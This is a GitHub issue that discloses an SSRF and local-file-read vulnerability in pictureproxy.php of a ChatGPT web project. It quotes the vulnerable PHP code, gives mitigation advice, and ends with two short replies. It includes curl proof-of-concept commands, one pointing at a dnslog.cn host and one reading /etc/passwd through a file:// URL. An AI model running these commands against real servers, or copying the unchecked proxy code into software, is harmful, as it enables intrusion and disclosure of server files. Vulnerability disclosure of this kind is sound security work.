SSRF vulnerability in `pictureproxy.php` File
zer0yu opened this issue · 2 comments
SSRF vulnerability in pictureproxy.php File (chatgpt)
0x01 Affected version
vendor: https://github.com/dirk1983/chatgpt
php version: 7.x
0x02 Vulnerability description
A Server-Side Request Forgery (SSRF) in pictureproxy.php file of [chatgpt](f9f4bbc) allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter. It should be noted that this vulnerability can be triggered without the need for authentication and is therefore more harmful.
The vulnerable code is located in the pictureproxy.php file. Because the function does not perform sufficient checksumming on the url parameter, the taint is introduced from the $_GET['url'] variable into the tainted function file_get_contents , and after the file_get_contents function is executed it sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}Because the url parameter is unrestricted, it is also possible to use the server side to send requests, such as probing web services. The corresponding PoC is as follows:
curl -i -s -k http://mm1.ltd/pictureproxy.php?url=http://hbwqkb.dnslog.cn
If open_basedir is not configured to limit the directories that the request can manipulate, it can also result in arbitrary local file reads. The corresponding PoC is as follows:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/passwd
0x03 Mitigation
- It is recommended to change the
open_basedirparameter in thephp.iniconfiguration file to restrict the directories that can be accessed - It is recommended that an authentication function be added to limit the users who can use this feature
0x04 Acknowledgement
z3
Thanks for your kindness reminder.
前两天刚看到这条信息。内心OS:人家就好朋友们分享着用用,这都得提个漏洞,大哥你是真的饿了(手动狗头)